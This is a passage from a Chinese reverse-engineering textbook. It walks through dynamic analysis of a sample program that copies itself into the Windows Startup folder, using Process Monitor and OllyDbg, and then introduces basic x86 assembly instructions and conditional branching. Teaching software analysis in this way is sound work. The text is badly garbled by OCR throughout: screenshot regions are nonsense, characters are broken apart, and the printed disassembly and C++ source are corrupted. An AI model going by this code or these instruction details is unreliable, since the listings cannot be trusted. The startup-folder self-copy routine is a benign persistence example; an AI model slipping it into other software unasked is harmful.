640. wsample01b 4084 Gj Load Image em32\advapi 32. dll SUCCESS Image Base: 0... 
. 640. wsampleüib. 4084 Ej Load Image em32\rpert4. dll SUCCESS Image Base: 0. 
B41. wsampleüib 4084 Ej Load Image : \RINDORS syst em32\secur32. dll SUCCESS Image Base: 0. 
wsample0ib. 4084 Gj Load Image :ARINDORS syst em32\msvert. dll SUCCESS Image Base: 0. 
wsample01b 4084 Gj Load Image \RINDOWS\ sy st em32\shlwapi. dll SUCCESS Image Base: 0... 
641.. wsampleüib. 4084 EÀ FileSrstemControl C:VX SUCCESS Control: FSCT. 
.642. . wsample01b 4084 PA QueryOpen : AMAMSVCR1 00. dl1 NAME NOT FOUND 
642... []wsampleOib. 4084 BA QueryOpen \RINDOWS\ sy stem32\msver100. ll SUCCESS CreationTime:... 
642... [C]wsampleüib. 4084 E CresteFile \RINDOWS\ sy stem32\msver100. dll SUCCESS Desired Acces... 
642... []wsampleüib. 4084 Ek CresteFileMapping C: VRINDORSVs7zstem32Wmsvcri00. dll SUCCESS SyncT7pe: Syn.. 
642... C] wsample01b. 4084 PACreateFileMapping C:\RINDORS\systemS2\msver100. dll SUCCESS SyncType: Syn... M 


641. 
B41. 


B 
H 
日 
E 
E 
E 
E 
5 
E 
E 





by virtual memory 
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jus 


运行 wsample01b.exe， 会 弹出 一 个 写 着 Copied! 的 消息 框 。 与 此 同 
Hf, Process Monitor 也 会 输出 文件 和 注册 表 的 访问 日 志 。 
通过 日 志 ， 我 们 可 以 看 出 wsample01b.exe 访问 了 以 下 文件 。 


C:\Documents and Settings\XPMUser\ [ 开始 | 菜单 \ 程 序 \ 启 动 \ 
wsample01b.exe 


和 sample_mal.exe 很 像 吧 ? 


V 对 “启动 ”文件 夹 的 访问 


Bl Process Monitor — Sysinternals: www.sysinternals. com 
File Edit Event Filter Tools Options Help 
E 民 Tr r; " 
cS IABE!vaAGO!S!A-!([epg[azm 

Process Name PID Operation Path Result 
Clwsampletib. eze 4084 BA QueryOpen C:\Documents and Settings\XPMUser) [开始 | 菜单 \ 程 序 \ 自 动 SUCCESS 
. C]wsampleüib.exe 4084 ff RezCreateker HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS 
Flusampledib. exe 4084 Ø RegSet¥alue HKCU\Software\Mi crosoft \Rindows\CurrentVersion\Explorer\Shell Folders\... SUCCESS 
. Ejwsampledib. eze 4084 Ø RegCloseKey HKCU\Software\Mi crosoft\Windows\CurrentVersion\Ezplorer\Shell Folders SUCCESS 
Cjwsampleüib.eze 4084 EÀ CreateFile C: \M\wsample01b. exe SUCCESS 
wsampleüib.eze 4084 BA QuerrattributeT... C: \M\wsample01b. exe SUCCESS 
wsample01b. exe 2 \M\wsamp]e01b. exe SUCCESS 
wsanpleüib. exe :\M\wsample01b. exe SUCCESS 
wsanpleüib. exe 2 C: \M\wsample01b. exe SUCCESS 
wsample0ib. exe C:\M\wsampledib. exe SUCCESS 














INE ZUIHWESTTEIT: Ssi\wsample0ib. exe 


wsample0ib. exe 4084 BACloseFile C:\Documents and Settings\PMUser\ [FH] RRR Sh SUCCESS 
wsampleüib.exe 4084 Bk Queryattributel... C:\Documents and Settings\XPMUser\ [FÓ] RAVES \wsampledib. exe SUCCESS 
wsample0ib. exe 4084 Hk QueryBasicInfor... C:\Documents and Settings\XPMUser\ 「 开 始 | 菜单 \ 程 序 \ 咎 动 \wsample01b. exe SUCCESS 
wsampleüib.eze 4084 Bk QuerrAttributel... C:\M\wsample01b. exe SUCCESS 
wsampleüib.eze 4084 HÀ SetEndDfFileInf... C:\Documents and Settings\XPMUser\ [开始 | 茶 单 \ 程 序 \ 自 动 \wsample01b. exe SUCCESS 
wsample0lb. exe 4084 BACreateFileMapping C:\M\wsample01b. exe SUCCESS 
wsample01b. exe 4084 BR QuerrStandardIn... C: \M\wsample01b. exe SUCCESS 
wsampleüib.eze 4084 BkCreateFileMapping C:\M\wsample01b. exe SUCCESS 
wsampleüib.eze 4084 最 writepile C:\Documents and Settings\XPMUser\ T8561 保单 \ 程 序 \ 咎 动 \wsample01b SUCCESS 
| 





> 


Showing 441 of 225,833 events (0.19%) Backed by virtual memory 


我 们 可 以 打开 “启动 ”文件 夹 确认 一 下 ， 里 i 
exe 文件 。 

笔者 的 测试 环境 是 Windows XP SP3 ， 请 大 家 注意 不 同 环境 下 “局 
动 ”文件 夹 的 名 称 和 位 置 可 能 会 有 所 不 同 。 在 Vista 及 更 高 版 本 中 ,“ 启 
动 ”文件 夹 位 于 以 下 位 置 。 











I 











i 果然 有 wsample01b. 








C:\Users\ HAZ \AppData\Roaming\Microsoft\Windows\Start Menu 
Programs\Startup 
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1.3.2 ”调试 器 是 干什么 用 的 

通过 Process Monitor 我 们 只 能 知道 上 面 这 些 信息 ， 如 果 要 进一步 跟 
踪 程 序 逻 辑 ， 我 们 需要 使 用 调试 器 。 

调试 器 是 一 种 帮助 发 现 程序 问题 和 busg 的 软件 ， 一 般 来 说 至 少 应 
备 以 下 功能 






































。 断 点 
。 单 步 跳 入 、 跳 出 
。 查看 寄存 器 和 内 存 数据 


断 点 是 能 够 让 程序 在 任意 位 置 中 断 、 恢 复 运 行 的 功能 。 我 们 可 以 在 
可 能 会 发 生 bug 的 地 方 稍 往 前 一 点 设置 一 个 断 点 ， 以 便 找到 导致 问题 的 
pu 如 果 是 机 器 语言 ， 则 以 指令 为 单位 来 设置 断 点 ; 
而 如 果 是 高 级 语言 ， 则 以 源 代 码 的 行为 单位 来 设置 断 点 。 

有 条 指令 都 中 断 
次 就 叫 作 单 步 跳 人 或 跳出 。 通 过 单 步 运行 功能 ， 我 们 可 以 以 一 条 指令 或 
者 一 行 代码 为 单位 逐个 运行 程序 中 的 逻辑 ， 仔 细 确 认 内 存 和 变量 的 状 
态 。 跳 入 和 跳出 的 区 别 如 下 所 示 。 






























































BA: 调用 函数 时 进入 函数 内 部 
。 跳出 : 调用 函数 时 不 进入 函数 内 部 ， 而 是 将 函数 调用 作为 一 条 指 
令 来 执行 





最 后 就 是 查看 寄存 器 和 内 存 数据 了 ， 这 个 功能 可 以 在 程序 中 断 运行 
的 状态 下 确认 寄存 器 、 内 存 和 变量 的 状态 
et 安装 方法 请 参见 附录 。 





e OllyDbg 
http://www.ollydbg.de/ 




















二 进 制 代码 
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1.3.3 用 OllyDbg 洞察 程序 的 详细 逻辑 
现在 我 们 将 wsample01b.exe 36; & 8] OllyDbg 的 图 标 上 。 


V 用 OllyDbg 打开 wsample01b.exe 


c) 
x 





File View Debug Options Window Help E 


[到 x] »[n] «jeg ju[-| sj 工 


TOIOISSDT -^ES-EBFDFFFF | IMP vsanp let. GOT a 
004013: 

00401334] 
86401 
00401337 
80491330| 
6040132 
81388| 






























































0656 
2FFEO 










ntal L.K iFastSystencal li 















ERFFFFFF 
7C936268 ntdll.7C938288 
88401298 UsanpleG. <Hodu leEnt ryPot 
5 it BLEFFFFFFE) 

it BLFFEEFFFE] 
it BIFFEFFFEE] 
it BFFFFFFFF) 
GB Soit TFFDFOBBLFFF) 
8008 NULL 


LastErr ERRDR PR 


B040138E| 
B6401384 | 
10401 SBA 











$ 





B84013E3 





B04013ER| 


S 
st BC2D ASIA NOU W 
DE NAM 
2O30136P||: Brus 器 3laaaa| FOF DuoRD PTR ps: t4631582 
GosoisFi|| : Bae HOU ERX, DWORD PTR SS: [EBP] a 一 
909 





partes Hoy DWORD PTR DS: 405141, RON (NO, NB, E, B 
80401 F3] EAK, doa UNORI D1D 01050104 00: 
08401 arC MOU DWORD PTR DS: [483150], ERX ORT. D109 01905104: 00 
0040140 





LER ERX, DWORD PTR SS: CEBP+6] 
NOU DWORD P 


401404 TERK, 
EE 









REN rory 
HEC pugo m 
d. ERK, oso pig 





Cond 18 8 
p c NEF 
DURO. PTR SS: tEBE- 3001 Eit Prec MEHR 


ERX, DWORD PTR DS: (4030041 
可 仔 器 


TCSITGETIRETURN to Kerne Tae, 
a ? ntal l. 7 998206. 


























IE 


Fe 3 | FFFFFFFF| 
bol? c | 901sFEG8| zFFbsee8| 
| 39913FFD4 

s SO12FFDÓ 





89]! 
E 


90|- End of SEH chain 


SE handler 












00403950) 








E F 内 存 转 储 数据 





全 04639088| [E 





wsanp led. <Modu leEntryPoir 





[2:9 E 3 
88483868| 39 99 88880000) 
6403070 86 68 


86 9 
B 83 80 G 
LE 
? 00 的 D0| ¥ 


Rill wert 17 etal proceder 2 ears a EGENT DURER RR 


OllyDbg 的 画面 包括 以 下 几 个 部 分 。 
































主要 反 汇 编 窗口 
内 存 数据 窗口 
寄存 器 

当前 栈 





à 








这 些 窗口 各 自 的 功能 我 们 可 以 慢 慢 学 ， 现 在 我 们 先 按 下 面 任意 方式 
进行 操作 ， 然 后 在 弹出 的 窗口 中 输入 00401000， 按 下 OK 按钮 。 











。 在 反 汇 编 窗口 中 按 Ctrl+G 
。 在 单 击 右键 弹出 的 菜单 中 点 击 Go To 一 Expression 


13 ”尝试 动态 分 析 | 25 


V 跳 转 到 地 址 00401000 


Enter expression to follow in Stack (x) 


[00401 000 v 
Cancel 














这 时 ， 反 汇编 窗口 中 会 显示 出 地 址 00401000 以 后 的 程序 逻辑 。 
这 些 程序 逻辑 对 应 的 汇编 代码 如 下 。 





























00401000 >/$ 55 PUSH EBP 

00401001 . 8BEC MOV EBP,ESP 

00401003 . B8 04200000 MOV EAX,2004 

00401008 . E8 D3080000 CALL wsample0. chkstk 

0040100D . A1 00304000 MOV EAX,DWORD PTR DS:[ security 
cookie] 

00401012 "oou XOR EAX,EBP 

00401014 . 8945 FC MOV DWORD PTR SS: [EBP-4] , EAX 
00401017 . 68 00100000 PUSH 1000 

0040101C . 8D85 FCDFFFFF LEA EAX,DWORD PTR SS: [EBP-2004] 
00401022 "250 PUSH EAX ; | PathBuffer 
00401023 . 6A 00 PUSH 0 8 | hModule = NULL 
00401025 FF15 04204000 CALL DWORD PTR 

DS: [<GetModuleFileNameW>] 

0040102B . 8D8D FCEFFFFF LEA ECX,DWORD PTR SS: [EBP-1004] 
00401031 Sl PUSH ECX 

00401032 . 6A 00 PUSH 0 

00401034 . 6A 00 PUSH 0 

00401036 . 6A 07 PUSH 7 

00401038 . 6A 00 PUSH 0 

0040103A FF15 B4204000 CALL DWORD PTR 

DS: [<SHGet FolderPathw>] 

00401040 . 68 14214000 PUSH OFFSET "\wsample01b.exe" 
00401045 . 8D95 FCEFFFFF LEA EDX,DWORD PTR SS: [EBP-1004 
0040104B "O52 PUSH EDX ; |ConcatString 
0040104C . FF15 08204000 CALL DWORD PTR DS: [<lstrcatW>] 
00401052 . 6A 00 PUSH 0 ; /FaillfExists = FALSE 
00401054 . 8D85 FCEFFFFF LEA EAX,DWORD PTR SS: [EBP-1004 
0040105A -50 PUSH EAX ; |NewFileName 
0040105B . 8D8D FCDFFFFF LEA ECX,DWORD PTR SS: [EBP-2004 
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口 























00401061 o i PUSH ECX ; |ExistingFileName 
00401062 . FF15 00204000 CALL DWORD PTR DS: [<CopyFileW>] 
00401068 «< 8B4D FC MOV ECX,DWORD PTR SS: [EBP-4] 
0040106B o Save) XOR ECX,EBP 
0040106D 5 33C0 XOR EAX, EAX 
0040106F . E8 2F000000 CALL wsample0. security check cookie 
00401074 . 8BE5 MOV ESP,EBP 
00401076 < 5D POP EBP 
OOL0107 7 Ao C3 RETN 
也 许 你 会 问 :“ 我 看 不 懂 这 些 汇编 代码 ， 是 不 是 没 办 法 继续 分 析 了 














呢 ?” 其 实 看 不 懂 汇 编 并 没有 大 但 ， 软 件 分 析 的 目标 是 搞 清楚 程序 到 底 
干 了 什么 ， 和 实际 的 编程 是 不 同 的 。 我 们 不 需要 完全 理解 所 有 的 逻辑 ， 
只 要 能 看 出 个 大 概 就 可 以 了 。 











IT 














1.8.4 对 反 汇 编 代 码 进行 分 析 


现在 让 我 们 来 仔细 看 看 00401000 之 后 的 程序 逻辑 。 我 们 发 现 程序 
依次 调用 了 GetModuleFileNameW, SHGetFolderPathW, 、lstrcatW、 
CopyFileW ix JL PR. 

回想 一 下 ， 刚 才 我 们 用 Process Monitor 已 经 发 现 程序 会 向 “启动 ” 
文件 夹 复制 文件 ， 我 们 可 以 推测 “上 面 的 CopyFileW 函数 就 是 用 来 执行 
这 一 操作 的 ”。 你 看 ， 即 便 看 不 懂 汇编 代码 ， 只 要 能 大 概 推测 出 程序 的 
逻辑 就 行 了 。 

那么 ,我 们 的 推测 是 否 正确 呢 ?” 可 以 通过 单 步 运 行 功能 来 确认 
Apu 

首先 选中 地 址 00401000 所 在 的 行 ， 然 后 按 F2 键 ， 或 者 单 击 右键 从 
菜单 中 选择 Breakpoint > Toggle。 这 时 ， 地 址 00401000 的 背景 会 变 成 
红色 ， 这 说 明 我 们 已 经 在 00401000 的 位 置 设置 了 一 个 断 点 。 

接 下 来 按 下 F9 键 ， 或 者 在 窗口 上 方 菜单 中 点 击 Debug Run. iX 
时 ，OllyDbg 会 启动 wsample01b.exe， 当 到 达 断 点 所 在 的 00401000 位 置 
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时 ， 程 序 会 暂停 运行 。 


v 程序 在 00401000 的 断 点 处 暂停 运行 






OllyDbg — wsaaple0lb- exze — [CPU — main thread, module Tsaaple0] 






[C] File View Debug Plugins Options Window Help 
ERES LL TT IT T H BBEBEBBHBBERB EI 


Eg 54200000 
uf c 
[ 
Ge 


接 下 来 ， 我 们 可 以 通过 单 步 运行 ， 逐 条 运行 程序 中 的 指令 。 按 F7 
表示 单 步 跳 入 ， 按 F8 表 示 单 步 跳 出 。 由 于 我 们 不 需要 进入 
GetModuleFileNameW 和 SHGetFolderPathW 函数 的 内 部 ， 因 此 在 这 里 我 
们 按 F8。 

随 着 每 次 按 下 F8， 程 序 都 会 执行 一 条 指令 ， 同 时 右上 方 的 寄存 器 窗 
口 和 右 下 方 的 栈 窗 口 的 内 容 也 会 发 生变 化 。 

现在 我 们 让 程序 一 直 运 行 到 00401062 的 地 方 ， 也 就 是 调用 
CopyFileW 之 前 的 位 置 。 这 时 ， 通 过 寄存 咒 窗 口 和 栈 窗 口 ， 我 们 可 以 看 
到 要 复制 的 文件 源 路 径 和 目标 路 径 。 

由 于 现在 CopyFileW 还 没有 被 调用 ， 因 此 在 “启动 ”文件 夹 中 还 
没有 文件 。 这 时 如 果 我 们 再 次 按 下 F8 E, 程序 就 会 调用 CopyFileW 
函数 ， 现 在 再 看 一 下 “启动 ”文件 夹 ， 我 们 就 会 发 现 其 中 已 经 出 现 了 
wsample01b.exe 文件 。 

通过 使 用 调试 器 ， 我 们 可 以 逐一 运行 程序 中 的 指令 ， 从 而 搞 清楚 在 
哪个 时 间 点 执行 了 怎样 的 操作 ， 这 是 动态 分 析 的 一 个 优点 。 
















= 1000 (4896.) 






NULL. 
eF i LeNamell 
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一 专栏 : 什么 是 寄存 器 


























寄存 器 是 位 于 CPU 内 部 的 存储 空间 ， 每 个 寄存 器 都 有 自己 的 名 
字 ， 分 别 叫 作 EAX、ECX、EDX、EBX、ESP、EBP、ESI、EDI、EIP。 
这 些 寄存 器 都 有 各 自 的 用 途 。 例 如 ESP 和 EBP 用 于 管理 栈 ， 而 
EIP 则 指向 当前 执行 的 指令 。 
OllyDbg 右上 方 的 寄存 器 窗口 中 会 显示 当前 所 有 寄存 器 的 值 。 





























































































































Y OllyDbg 的 寄存 器 窗口 








[3 





如 果 我 们 在 OllyDbg PIF F8 或 者 F7， 程 序 就 会 执行 一 条 指 
令 ， 这 时 我 们 可 以 看 到 EIP 的 值 会 根据 所 执行 指令 的 长 度 不 断 增 加 。 
在 EIP 的 下 方 还 有 C、P、A、Z、S、T、D、0O 这 几 个 字母 ， 它 
们 代表 标志 。 一 般 我 们 会 在 这 些 字母 后 面 加 上 一 个 字母 F ( Flag 的 
字母 )， 写 作 CF、PF、AF、ZF， 这 些 标志 主要 用 于 条 件 分 支 ， 比 如 
下 面 这 样 。 




























































































e 若 ZF 为 1 则 跳 转 
e zi CF 为 1 则 不 跳 转 

















本 上 只 要 理解 了 EAX、ECX、EDX、EBX、ESP、EBP、ESI、 
EDI, EIP 以 及 各 个 标志 寄存 器 的 作用 ， 我 们 就 可 以 进行 软件 分 析 了 。 
除 此 之 外 画面 上 还 会 显示 其 他 一 些 寄存 器 的 值 ， 关 于 这 些 寄存 器 ， 
等 我 们 上 手 一 些 之 后 了 解 也 不 迟 。 
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1.3.5 ”将 分 析 结 果 与 源 代码 进行 比较 


最 后 ， 我 们 照例 会 列 出 wsample01b.exe 的 源 代码 ， 大 家 可 以 将 自己 
分 析 的 结果 以 及 头脑 中 设想 的 程序 逻辑 与 源 代码 进行 比较 。 





V wsample01b.cpp 


#include «Windows.h» 
#include <tchar.h> 
#include <shlobj.h> 


int cpy (void) 
{ 
// 获取 自身 文件 路 径 
TCHAR szThis [2048]; 
GetModuleFileName (NULL, szThis, sizeof (szThis)); 
// 获取 “启动 ”文件 夹 路 径 
TCHAR szStartup[2048]; 
SHGetFolderPath(NULL, CSIDL STARTUP, 
NULL, SHGFP TYPE CURRENT, szStartup); 
lstrcat(szStartup, _T("\\wsample01b.exe") ) ; 
// 将 自身 复制 到 “启动 ”文件 来 
CopyFile(szThis, szStartup, FALSE); 
return 0; 















































int APIENTRY tWinMain( 
HINSTANCE hInstance, 
HINSTANCE hPrevInstance, 
LPTSTR lpCmdLine, 
int nCmdShow) 


epy (i 

MessageBox (GetActiveWindow(), 
_T("Copied!"),  T("MESSAGE"), MB OK); 

return 0; 











在 软件 分 析 中 ， 我 们 需要 按照 目的 和 需要 选择 使 用 静态 分 析 还 是 动 
态 分 析 。 
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标 程序 
而 动态 
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从 分 类 的 角度 来 看 ， 静 态 分 析 和 动态 分 析 的 区 别 在 于 “是 否 运 行 
， 但 从 笔者 个 人 感觉 来 看 ， 静 态 分 析 比 较 偏 向 于 “总 览 全 局 ” 
态 分 析 则 比较 偏向 于 “ 细 看 局 部 ”。 











H 





, 


因此 , 在 进行 软件 分 析 的 时 候 ， 一 般 都 是 先 用 Stirling fll IDA 






































































































































看 一 下 整体 的 样子 ， 然 后 再 用 OllyDbg 单 步 运行 来 查看 一 些 特别 关注 
的 点 o 
当然 ， 上 面 只 是 我 的 个 人 感觉 ， 也 会 有 一 些 例外 的 情况 。 随 着 经 验 
的 积累 ， 大 家 完全 可 以 摸索 出 自己 喜欢 的 方式 。 
一 专栏 : 选择 自己 喜欢 的 调试 器 
Windows 环境 中 有 几 款 主流 的 调试 器 ， 每 个 人 的 喜好 都 有 所 
不 同 。 
e OllyDbg 
http://www.ollydbg.de/ 
* Immunity Debugger 
http://www.immunitysec.com/products-immdbg.shtml 
* WinDbg ( 32 位 版 本 ) 
http://msdn.microsoft.com/zh-cn/windows/hardware/gg463016 
e WinDbg ( 64 位 版 本 ) 
http://msdn.microsoft.com/zh-cn/windows/hardware/gg46301 2 
其 中 OllyDbg 是 一 个 非常 流行 的 工具 ，Immunity Debugger 也 
和 OllyDbg 一 样 具 备 图 形 用 户 界面 。 Immunity Debugger 和 

















Python 的 亲 和 性 较 高 ， 因 此 受到 Python 爱好 者 的 欢迎 ， 但 笔者 只 

















=E 














用 过 OllyDbg 和 WinDbg, W itt Xt Immunity Debugger 并 不 熟悉 
(FF Jo 



































WinDbg 不 太 适 合 新 手 ， 有 些 老手 也 不 喜欢 用 它 。 不 过 ， 只 






































有 WinDbg 能 够 对 系统 内 核 领 域 的 程序 进行 调试 ， 因 此 在 分 析 像 






































Rootkit 这 样 在 Windows 内 核 中 运行 的 恶意 程序 时 还 是 离 不 开 它 。 











关于 最 流行 的 OllyDbg， 


近 开 发 的 2.xx 版 本 。 最 新 的 版 本 不 能 说 比 老 
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来 看 变化 太 大 ， 感 觉 像 是 
比较 喜欢 用 新 版 。 





























zr 
mÁ ZU E 


不 同 的 新 











了 不 过 也 














比较 经 典 的 1.10 版 本 ， 以 及 最 
版 要 好 ， 从 功能 等 方面 


些 人 
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1.4 学习 最 基础 的 汇编 指令 


1.4. 


» 


可 能 


为 只 
人 少 


绍 一 


1 没 必要 记 住所 有 的 汇编 指令 














很 多 读者 还 是 会 觉得 有 些 难度 。 


通过 实际 尝试 静态 分 析 和 动态 分 析 ， 
一 码 事 有 了 一 些 了 解 。 如 果 大 家 觉得 比 想象 中 要 容易 那 是 最 好 ， 不 过 


相信 大 家 已 经 对 软件 分 析 是 怎 




















那么 到 底 难 在 哪里 呢 ? EHI E 











汇编 语言 。 


和 一 般 编 程 语言 的 保留 字 相 比 ， 汇 编 语言 的 指令 数量 多 得 离谱 ， 因 
有 记 住 将 近 1000 条 指令 才能 编写 出 像样 的 程序 ， 难 怪 想 学 汇编 的 























得 可 怜 。 








不 过 ， 说 实在 的 ， 在 逆向 工程 中 需要 用 到 的 汇编 语言 知识 并 没有 那 
么 多 。 正 如 Windows 程序 员 没 必 要 记 住所 有 的 Windows API 函数 一 样 ， 
做 逆向 工程 也 没 必 要 记 住 太 多 的 汇编 指令 ， 遇 到 不 会 的 指令 查 一 下 就 行 
了 ， 实 际 上 我 们 需要 掌握 的 指令 也 就 是 20 一 50 条 左右 。 


























下 CPU 的 工作 原理 。 
首先 我 们 来 看 看 “以 笔者 的 “主观 











下 面 我 们 就 来 讲解 一 下 逆向 工程 所 需要 掌握 的 汇编 指令 ， 并 简单 介 




















避 见 ”为 标准 选 出 的 常用 汇编 指 


























令 ”。 这 里 的 内 容 全 部 基于 笔者 的 个 人 感觉 知道 这 些 指令 应 该 就 能 够 


基本 


EFT. 














顺便 一 提 ， 这 里 讲解 的 内 容 以 简单 易 懂 为 首要 目标 ， 相 应 地 牺牲 了 


























iti 
一 下 



































性 。 如 果 大 家 有 兴趣 继续 深入 学 习 汇 编 语 言 的 话 ， 请 务必 重新 查阅 





这 些 指令 的 用 法 。 


1.4 


V 常用 汇编 指令 
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指令 示例 €x 说 明 

MOV MOV EAX,ECX | EAX = ECX 将 ECX 的 值 存 入 EAX 

ADD ADD EAX,ECX EAX += ECX 将 EAX 的 值 加 上 ECX 的 值 

SUB SUB EAX,ECX EAX -= ECX 将 EAX 的 值 减 去 ECX 的 值 

INC INC EAX EAX++ 将 EAX 的 值 加 1 

DEC DEC EAX EAX-- 将 EAX 的 值 减 1 

LEA LEA EAX,[ECX+4] | EAX = ECX+4 将 ECX+4 的 值 存 入 EAX 

CMP CMP EAX,ECX if(EAX == ECX) 对 两 个 值 进行 比较 并 根据 结果 设 
ZF=1 置 标志 

else 若 EAX 与 ECX 相同 ， 则 ZF=1 

ZF=0 若 EAX 5 ECX 不 同 ， 则 ZF=0 

TEST TEST EAX,EAX | if(EAX == 0) 将 值 与 0 进行 比较 并 根据 结果 设 

F=1 置 标志 
else 若 EAX 为 0， 则 ZF=1 

ZF=0 若 EAX 不 为 0， 则 ZF=0 

JE(JZ) JE 04001000 if(ZF==1) 若 ZF 为 1， 则 跳 转 到 04001000 
GOTO 04001000 

JNE(JNZ) | JNE 04001000 if(ZF==0) 若 ZF 为 0， 则 跳 转 到 04001000 
GOTO 04001000 

JMP JMP 04001000 | GOTO 04001000 无 条 件 跳 转 到 04001000 

CALL CALL IstrempW 调用 IstrempW 

PUSH PUSH 00000001 将 00000001 入 栈 

POP POP EAX 出 栈 并 将 获取 的 值 存 入 EAX 

















1.4.2 ”汇编 语言 是 如 何 实 现 条 件 分 支 的 
如 果 有 一 定 的 编程 经 验 ， 看 了 上 面 这 张 表 应 该 能 理解 一 半 以 上 的 指 



































。 其 中 需要 特别 说 明 的 指令 应 该 只 有 cmp, test 以 及 je 、jne XUL, 


4 

这 些 指令 用 于 在 汇编 语言 中 实现 条 件 分 支 。 
一 般 的 编程 语言 中 ， 都 是 通 

的 。 而 在 汇编 语言 中 ， 则 是 通过 

标志 完成 分 支 的 跳 转 类 指令 来 实现 的 。 








过 if. switch 等 保留 字 来 表现 条 件 分 支 
控制 标志 的 cmp, test 指令 ， 以 及 根据 





























jus 
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举 个 例子 ， 请 大 家 回想 一 下 wsample01a.exe。 在 那个 程序 中 ， 会 判断 
命令 行 参数 是 否 为 2012， 然 后 显示 不 同 的 消息 ， 这 就 是 一 种 条 件 分 支 。 
我 们 再 来 看 一 下 wsample01a.exe 的 汇编 代码 。 











Y wsample01a.exe 


00401000 ; int  stdcall wWinMain(int,int,LPCWSTR lpStringl,int) 


00401000 wWinMain proc near 





00401000 

00401000 lpStringl = dword ptr 10h 

00401000 

00401000 push ebp 

00401001 mov ebp, esp 

00401003 mov eax, [ebp+lpStringl 

00401006 push Owe eo 
0040100B push eax - 1pStripgl 
0040100C call ds: imp lstrcmpW@8 ; lstrcmpW(x,x) 
00401012 push 0 ; uType 

00401014 push offset Caption ; "MESSAGE" 
00401019 test eax, eax 比较 

0040101B jnz short loc 401035 条 件 分 支 
0040101D 显示 Hello! 2012 
0040101D push offset Text p "Hello! 2012" 
00401022 call ds:__imp__GetActiveWindow@0 ; 
GetActiveWindow() 

00401028 push eax ; hWnd 

00401029 call ds: imp M MessageBoxWGl6 ; MessageBoxW(x,x,x,x) 
0040102F xor eax, eax 

00401031 pop ebp 

00401032 retn 10h ; lpCaption 
00401035 loc 401035: 显示 Hellol Windows 


00401035 push offset aHelloWindows ; "Hello! Windows" 
0040103A call ds: imp  GetActiveWindow90 ; 
GetActiveWindow () 

00401040 push eax ; hWnd 

00401041 call ds: imp  MessageBoxWOl6 ; 
MessageBoxW (x, x,x,x) 

00401047 xor eax, eax 

00401049 pop ebp 

0040104A retn 10h 

0040104A wWinMain  endp 
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其 中 在 0040101B 的 地 方 出 现 了 一 个 jnz 指令 ,这 就 是 分 六 所 在 的 
位 置 。 

00401019 的 test 指令 ， 简 单 来 说 就 是 一 个 只 改变 标志 的 and 指令 
不 过 接 下 来 你 可 能 又 会 问 :“ 那 and 指令 又 是 喻 ?” 这 样 讲 下 去 又 要 没完 
没 了 了 ， 索 性 我 们 就 把 问题 变 得 简单 一 点 。 

test eax, eax 的 意思 就 是 ， 当 eax 为 0 时 将 ZF 置 为 1。 

在 大 多 数 情况 下 ，test 指令 都 会 跟着 两 个 相同 的 寄存 器 名 称 ， 如 test 
eax, eax, HL test ecx, ecx。 
因此 ， 只 要 看 到 带 有 两 个 相同 寄存 器 的 test 指令 ， 一 般 就 是 条 件 分 
文 ， 可 以 简单 理解 为 “大 寄 存 器 值 为 0， 则 将 ZF OM". 

jnz 指令 的 意思 是 ， 当 ZF 不 为 0 时 进行 跳 转 。 因 此 ， 将 jnz 指令 和 
test 指令 结合 起 来 就 实现 了 下 面 的 逻辑 。 


4 





























。 若 eax 为 0 则 不 跳 转 
e # eax 为 1 则 跳 转 


那么 ，eax 值 又 是 从 哪里 来 的 呢 ? 它 是 0040100C 的 call lstrcmp W 
的 返回 值 。 





143 ”参数 存放 在 栈 中 


call 指令 是 用 来 调用 子 程序 的 ， 这 一 点 应 该 不 难 理解 ， 它 的 返回 值 
被 存放 在 eax 中 。 这 可 以 看 作 是 一 种 惯例 ， 在 大 多 数 处 理 器 中 者 是 这 样 
做 的 。 所 以 如 果 你 问 我 “为 什么 子 程序 的 返回 值 要 放 在 eax 中 呢 ?” 我 
也 只 能 回答 你 :“ 这 是 一 个 惯例 。” 当 我 们 用 汇编 语言 编写 子 程序 的 时 候 ， 
也 要 记得 将 返回 值 存放 在 eax 中 。 

那么 ， 传 递 给 子 程 序 的 参数 放 在 哪里 呢 ? 参数 要 通过 push 指令 存 
放 在 栈 中 。OllyDbg 的 右 下 方 就 是 栈 窗 口 ， 大 家 可 以 注意 看 一 下 ， 每 当 
执行 push 指令 时 ，push 的 值 就 会 被 放 和 人 栈 中 。 
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综 上 所 述 ， 子 程序 的 调用 可 以 理解 为 下 面 的 过 程 。 














v C 语言 中 的 函数 调用 
Eunmet onl 
汇编 语言 中 的 函数 调用 


push 3 
push 2 
push 1 
call function 








在 汇编 语言 中 ， 参 数 是 按照 从 后 往 前 的 顺序 人 栈 的 ， 其 实 这 方面 的 
规则 会 根据 CPU 和 编译 器 的 不 同 而 存在 一 些 差异 ， 大 家 只 要 记 住 “ 参 
数 是 通过 栈 来 传递 的 ”就 可 以 了 。 

例如 ，00401006 位 置 上 的 代码 如 下 。 





















































00401006 push Ome Berlina Uo 
0040100B push eax 7 IpStripgl 
0040100C call ds:__imp__lstrcempWe8 ; lstrcmpW(x,x) 














如 果 改 写成 C 语言 会 是 什么 样 的 呢 ? 
由 于 参数 是 从 后 往 前 入 栈 的 ， 因 此 应 该 是 下 面 这 样 。 














eax = lstrcmpW(eax, "2012"); 


我 们 刚才 已 经 讲 过 ， 返 回 值 是 存放 在 eax 中 的 。 

IstrempW 函数 的 功能 是 ， 当 参数 中 的 两 个 字符 串 相 同时 ， 则 返回 
0， 和 否则 返回 非 0。 因 此 ， 如 果 eax 与 2012 相同 ， 则 结果 就 是 eax=0。 

00401019 的 test 指令 表示 若 eax 为 0 则 将 ZF 置 为 1，0040101B 的 
jnz 指令 表示 当 ZF 为 0 时 进行 跳 转 。 因 此 ， 当 ZF 为 1 时 程序 不 会 进行 
跳 转 ， 而 是 继续 执行 0040101D 的 指令 ， 结 果 就 显示 出 了 Hello! 2012 这 
条 消息 


Uo 









































如 果 刚 才 的 讲解 太 快 ， 有 的 地 方 还 是 搞 不 履 ， 也 没什么 大 问题 ， 建 








议 大 家 翻 回 去 重新 看 一 遍 wsample01a.exe 的 汇编 代码 。 
我 们 刚 开 始 尝 试 静态 分 析 的 时 候 ， 只 是 将 代码 看 风 了 一 个 大 概 ， 而 
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现在 我 们 已 经 学 习 了 一 些 汇编 指令 ， 再 看 代码 的 时 候 是 不 是 有 新 的 发 现 
WE? 是 不 是 感觉 比 之 前 更 容易 读 公 了 呢 〈 真心 希望 大 家 能 给 个 肯定 的 回 


答 呢 ) ? 


1.4.4 ”从 汇编 代码 联想 到 C 语言 源 代码 
